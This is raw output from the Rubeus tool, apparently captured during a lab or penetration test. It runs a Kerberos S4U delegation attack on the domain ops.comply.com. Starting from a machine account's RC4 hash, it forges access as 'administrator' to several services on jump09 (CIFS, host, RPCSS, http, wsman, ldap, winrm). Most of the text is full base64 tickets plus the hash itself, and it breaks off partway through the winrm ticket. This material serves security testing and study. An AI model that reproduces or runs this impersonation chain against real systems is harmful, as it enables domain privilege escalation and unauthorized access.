|_| |_|____/|____/|_____)____/(___/
v2.1.1
[*] Action: S4U
[*] Using rc4_hmac hash: FC525C9683E8FE067095BA2DDC971889
[*] Building AS-REQ (w/ preauth) for: 'ops.comply.com\\crack$'
[*] Using domain controller: 172.16.64.165:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID+zCCA/dhggPzMIID76ADAgEFoRAbDk9QUy5DT01QTFkuQ09NoiMw
IaADAgECoRowGBsGa3JidGd0Gw5vcHMuY29tcGx5LmNvbaOCA68wggOroAMCARKhAwIBAqKCA50EggOZ
Rf4/V7Dlhvtc3CXGQB2GXPFJUt0kOBW9m4SMP/E8K7aVzSSvqm9iFrzPnig6wesX+VTC6JcpZm57TqkN
Gq1B6LTRa8Ib3EbhawaZsKQrpEAWRwnobYnBt/LUPbhaYDEQ3JeDAmKuMqA/l/6iN1ACqWRoY8UkuatV
APDnRz6Gmwb/RAJPlQ5ZKtZv3QdfBJmhLe31PvKUPz5N5AOVU2I8K3W9a+dA2OcjYW9k7KxnAb71uGWp
QxKR65LVBGPEfHjACXQKfQxvkFL24yfjS7utdmY8mQWrvqciGUDZVrZS9MJ1rE/q2q9w2QArHCv2U9ql
zo8hLdh7EZG/7HTngApFOl7s3L98iyuxXTRFzTm5NpKvgtmEFAOMhZVTzhaarxNyWjvYWk07b9kGUORf
01rRtowA7N8mfroY/hNIip6OLvwEsXS7FaxTcYjcVAl5y9gfW32Hda/9c7rO/eoSu69AAGSvdH5GSlz3
8zFWu4ozdpGPvZJAr82Ev1L6AjRur6wzEtGH5wWZGOJjAnKQs2T3PSrvDEFh9SHpBZHbhw4bO1kI5p99
XS4gRTTyF8rmfGjuIQ2Hm8dLVwuJIDMhLxFkVXpyGEZw/qRrykNkZK0PID/XLGNoGiJ3DSgf00oGQpgu
AFDmxybzkubzoXFhvBkm7caZ98oZ1OL2mca1LoL0XXMWRopzoAUsey7aylhxv//Y9W/B1iAn6dm3I3Yx
XSWwgvvqgZO7Pr6kdvrYX9fNs7su5tgMDaWvxwj2sjYFjVBfqmuiVYFH2QTfTuFGiJWRtS/aMrcMM3qY
C1okLyODc/zFXraWxsD8dG92IEK8vs6Z9l3RJ1GnpmnddcSF4hnp69YJqQAJrodojXQ9EFjMPTTOq7Qd
bX7vPJ8kIURGw3HUkOR/Gq8mNe9LqC4jPo8DPGGJOwuyf32+pVf7ec4tdW4loSnay5hGGCBkkijcXE5a
x72qkrrVyMM8wQiRSZK5qnqzeYe6K4uy6gEewXWUrJT84LMD3zrGMX+8kK8XVKB5rkww2S1U3LGTm7W+
vZkYwUbUKu4AdreESfWZ0/UZJ+8SSw1XcYYUmSeTTeTjyR4EA9lbxKQek/AiCzCtLMDtnNzz+GTkWqIG
QK4Q0yrv5UqGxkoMSfTgeHGhRX/70k7EUtwezmCBHDf0GxaBfc1v5663Hqx2wt+nXHQEOwGRo1Gqt58w
eBA4LgRtaKoLKGpj/WMN2/Bpv/i+o4HaMIHXoAMCAQCigc8Egcx9gckwgcaggcMwgcAwgb2gGzAZoAMC
ARehEgQQikWz3UpZ9pd6FseiDe5hRqEQGw5PUFMuQ09NUExZLkNPTaITMBGgAwIBAaEKMAgbBmNyYWNr
JKMHAwUAQOEAAKURGA8yMDIyMDczMTE0MzYxM1qmERgPMjAyMjA4MDEwMDM2MTNapxEYDzIwMjIwODA3
MTQzNjEzWqgQGw5PUFMuQ09NUExZLkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOb3BzLmNvbXBseS5j
b20=
[*] Action: S4U
[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: cdc07.ops.comply.com (172.16.64.165)
[*] Sending S4U2self request to 172.16.64.165:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to '[email protected]'
[*] base64(ticket.kirbi):
doIFPDCCBTigAwIBBaEDAgEWooIEVjCCBFJhggROMIIESqADAgEFoRAbDk9QUy5DT01QTFkuQ09NohMw
EaADAgEBoQowCBsGY3JhY2sko4IEGjCCBBagAwIBF6EDAgEBooIECASCBATl9z2/anuhoQZ2JUnqfdtb
eKZpEmV4Z8Re6Ci2YiENqX28oiW1jHyr9E1+iXMup0EjZUlg5tmlJlwwndYRzQQy1dYnhgMsA6eqfkAS
oBnQtNIwgJoHEDpPbCqkDV7aBQIRS5avvDSjeKhhU05CgZqb2aAnI8dcz1w1Ib2rQjAQREV1lBcXBMXY
O7bx+6RBYhF8MOoR1kO/muw/6VbzcIUq/kCrkWCDrUiQWQlknW+1eGZVY0bPmtGW3xY54w4XezosFaGl
J8IeupjC+QFvcjTWxINfI5J6pPk2eoAUBYSrUwH9MqNkB/jE702N/I3HMxLJbJ7D5LRaeZzsJiLSX/uX
1pt+wAK99oEmkpSFD/t6orQ/Rn6V34zoEuf4wIYj1mKFGdI1XJWWh/zKTB5QvG1s9iVSoezAWoPTwGO3
bNsaI/i9StLgD/iIg7MfYz7ERWfSbDrnlB+IAcXX+R3Jrtiofpeff9fn6yVN/CYRhfmBuOI8wx0Mn/9x
HLzEM9kof4b/j0Z5T79bASUK3+HVvrTLigwiNJWcFSp9wSRUbRhUwJQ4Qkky+j3qguJkb2xweU89pTqB
lJn0n/XcmA4Bf4yOOFm7Rozn+PS0VmD5XgQwkJVjdqWk47ArohDnbw3u+O5aC4naFNjcMYrcDZdS7dX1
tnsB/Dzai/MYhMWW+QMVYsB/dKLSZxgLkBAZid2wyj0RPnE18zygdOD6dPaF/VVs+ogXZEuaL8Rl2221
afg5tyrIqD48x6a2lDFV/p5mSAp3i1LhquxFpCf0fnMtcz/Fsciaxn5Z/+srVcpiUZdOVZafkTlwhWNc
lB34jHEUDYjlrI4HfsxL+LnuCSKbqBgM+qYyjvpB/Og3HUckRA6aTCuPff80UwABaF3gH/2NwkQxK3ub
EwocowbA6ohMkdlheo9OaO8Q9cnYDY6sTfw+e4b3rkz8tG1Rn4wZO/A3tKDmqsRWScmX/p1EGjh4qmPJ
R2Je2oRYmOG/Kd2bcca6R7GD6yOFx8MwQPeGQpLtebOR6nYE0uHzt3/FoGL1T/ZMtyn5mcFxVNP7E2RZ
a71fUmDXUHtdRr1TQW/0A2/Rn8JxAqao8ug5DnD0qR/suwtkzO6FTtHXJFo6k9qaKMZJTPx6vO1aurMS
DsEg01UxPL3YUcQIMqsy+7nFNbBXUEX3WcTmxgyvKLEPepiFgg1dZ0IGoQNve7FFFkpr5zvnqUoxPG61
PgU9gbNpfoPzhvB3acJjLUhgeIz3a15TdCm/AUDbmgUu1r0krNKBmN0jKOJpmcvr9mAPwAqI7fQcQ89E
vDhk+3Vpef8hgG5+M2WuKzE7hULA+qT3xQgINOQFbT5U5CwHb5Z8c+LhM9uBou+ODEXbo6OB0TCBzqAD
AgEAooHGBIHDfYHAMIG9oIG6MIG3MIG0oBswGaADAgEXoRIEEHlvTSd3TxAViH8FwaX+K+2hEBsOT1BT
LkNPTVBMWS5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAAoQAApREYDzIwMjIwNzMx
MTQzNjEzWqYRGA8yMDIyMDgwMTAwMzYxM1qnERgPMjAyMjA4MDcxNDM2MTNaqBAbDk9QUy5DT01QTFku
Q09NqRMwEaADAgEBoQowCBsGY3JhY2sk
[*] Impersonating user 'administrator' to target SPN 'CIFS/jump09.ops.comply.com'
[*] Final tickets will be for the alternate services 'host,RPCSS,http,wsman,ldap,winrm'
[*] Building S4U2proxy request for service: 'CIFS/jump09.ops.comply.com'
[*] Using domain controller: cdc07.ops.comply.com (172.16.64.165)
[*] Sending S4U2proxy request to domain controller 172.16.64.165:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'host'
[*] base64(ticket.kirbi) for SPN 'host/jump09.ops.comply.com':
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
bHkuY29t
[+] Ticket successfully imported!
[*] Substituting alternative service name 'RPCSS'
[*] base64(ticket.kirbi) for SPN 'RPCSS/jump09.ops.comply.com':
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
bXBseS5jb20=
[+] Ticket successfully imported!
[*] Substituting alternative service name 'http'
[*] base64(ticket.kirbi) for SPN 'http/jump09.ops.comply.com':
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
bHkuY29t
[+] Ticket successfully imported!
[*] Substituting alternative service name 'wsman'
[*] base64(ticket.kirbi) for SPN 'wsman/jump09.ops.comply.com':
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
bXBseS5jb20=
[+] Ticket successfully imported!
[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/jump09.ops.comply.com':
doIGGjCCBhagAwIBBaEDAgEWooIFHzCCBRthggUXMIIFE6ADAgEFoRAbDk9QUy5DT01QTFkuQ09Noigw
JqADAgECoR8wHRsEbGRhcBsVanVtcDA5Lm9wcy5jb21wbHkuY29to4IEzjCCBMqgAwIBEqEDAgEFooIE
vASCBLhjVlKUIURsFNdIuS/8xmJlio7ALa+LzGRv3Z1v0QiSi9K7NJeqic7j/QSeUu0TdQxssL52VEGt
6W38bqVu572/SfQpZs1pak33TDCm6SqVH/ookxvcVG5st70tYzU0JbHXzdZfNVgpor9r2OTlN+VcFJhL
CiuU8yKYgoZ5o2M4oc1iIPMjVI+Tz9wYH7Soc4MRu4+Txxkjb+7+OYwkDhe7bHPjYQBVp7pmXUuOlz1v
cfwwMeqw3BIRG9J2K/DUEO6iRu6KGOeFWkcFSHw4v5tU6SsT5kWWYFDACzGdXc5x5iLPLC0rAnX4O5y4
4cUxOTh5WU42wOQ0Isv89okinOKYI5jCK1k+tTyRfYIe2kVHv1tOeN2cZQ1WyV0bo0gSVJzB7oeHlaJk
9hBXSgHlLigSEPZsSkD8bSbgw0KKwXpLT2Fc3biwJ8YwigR8oPJ7pKfL6x/od4g3RF93M9+2QxxOpBxO
BssDavYsJtyZrUU17565Y97suM/L1SrSxcLSGfJRfkjgLoJCV1sIZAAjxy3pcIW64HGgCWvvUUxOotnA
ZpRoqILW1aBRAdImWlssYdbbdisHSCB88W2lVbmFc5QDSke2fyCeL8T05QBJKkYOrAXbhfvBmvUS5Xda
nwI67gmkQKJB+zh8MYA+VR4KctSfoflkusDEJ+KPUpzhB2f1z8WGJNo2XvmKSsSDTZvoMYKfUT0l1IZA
Ei7yToEqQaOMOvUHMTZCTGxZD81Ezh+wVL+BKH9t9bEhScCdy3o3GVw7WC7uDO7YbolOXfVFgOfig8AS
on42myPuFXqlhGkFPt/DhBrI0tGYmSEfzBiu2IlOFH4h/IThaPhmoh5GWo5UUZvCO2A1nIoFFaLjbjo2
dTMcE+DPfvJNTrqbZXj4ZYdL2eOPVioErsABZ958wZk3P0oZYRhlw4cUHLNE0ki+U9c/PACuvdgynUKQ
nS2LgtSb2eb0x3v+IMEs+qGEotaaL//rTvfYJtMdSIdLI+FDJiW+VaI+aDBRDGyEi2fz83Za/+35+Cr5
s1X+JI8SPbjZlF425nczHQ7JNdpaOCZljiOV5+oeczRkdTCwmZt+JAIf600qqoORJrB7FG8k+PJC2sq/
W8ZqnDCfrRu8PQbEum6DJkvRtCoOu1AwMCDZHEVXTJFl/Ha7aSOuBVQ2Auygm9VEpFYGAZVxq6nSRxNu
Uc6bknpU97ET6bh9R6NT/MpOXIjIqhEZJl1gxpTxErjbOh2qQMos9csT3IDISkgcyKDSOGCWB1CP9YSu
cxoEOj07mQHHqr6uI7Vxn7b91CI5D5i6Dh5+djNwq/qY/9a9cXbt/AvwXamsLE4xZPmQD4Dzjl608Mpj
taL/3Dz4O5tuCX1DkZ4L2mL+hlsjXl4yHNYqRALxhgrTdV35S+TIU/VI46AES3Na6uOGbNKL+eIzmyCF
TGuEuQb6+Bglhm5lt8Gcr2Dew1JbMTT5pc36G/Qtjf+ZhJ9chj8al5ajFoV/+Tbd4KVV3GV5mIz/4Unk
g4f6cvtK1AMHM+aW9YG2JjFwYhjWRzwdXKYOv8q9Vz3xOJLJHTSksSI7BN81YX6oQDc+hk0gSCaxVSO/
h6Mje6Qf9sNy4acvFqOB5jCB46ADAgEAooHbBIHYfYHVMIHSoIHPMIHMMIHJoBswGaADAgERoRIEEAdw
aR8w3HkCQr0w6cF7uqChEBsOT1BTLkNPTVBMWS5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9y
owcDBQBAoQAApREYDzIwMjIwNzMxMTQzNjEzWqYRGA8yMDIyMDgwMTAwMzYxM1qnERgPMjAyMjA4MDcx
NDM2MTNaqBAbDk9QUy5DT01QTFkuQ09NqSgwJqADAgECoR8wHRsEbGRhcBsVanVtcDA5Lm9wcy5jb21w
bHkuY29t
[+] Ticket successfully imported!
[*] Substituting alternative service name 'winrm'
[*] base64(ticket.kirbi) for SPN 'winrm/jump09.ops.comply.com':
doIGHDCCBhigAwIBBaEDAgEWooIFIDCCBRxhggUYMIIFFKADAgEFoRAbDk9QUy5DT01QTFkuQ09Noikw
J6ADAgECoSAwHhsFd2lucm0bFWp1bXAwOS5vcHMuY29tcGx5LmNvbaOCBM4wggTKoAMCARKhAwIBBaKC
BLwEggS4Y1ZSlCFEbBTXSLkv/MZiZYqOwC2vi8xkb92db9EIkovSuzSXqonO4/0EnlLtE3UMbLC+dlRB
relt/G6lbue9v0n0KWbNaWpN90wwpukqlR/6KJMb3FRubLe9LWM1NCWx183WXzVYKaK/a9jk5TflXBSY
SworlPMimIKGeaNjOKHNYiDzI1SPk8/cGB+0qHODEbuPk8cZI2/u/jmMJA4Xu2xz42EAVae6Zl1Ljpc9
b3H8MDHqsNwSERvSdivw1BDuokbuihjnhVpHBUh8OL+bVOkrE+ZFlmBQwAsxnV3OceYizywtKwJ1+Duc
uOHFMTk4eVlONsDkNCLL/PaJIpzimCOYwitZPrU8kX2CHtpFR79bTnjdnGUNVsldG6NIElScwe6Hh5Wi
ZPYQV0oB5S4oEhD2bEpA/G0m4MNCisF6S09hXN24sCfGMIoEfKDye6Sny+sf6HeIN0RfdzPftkMcTqQc
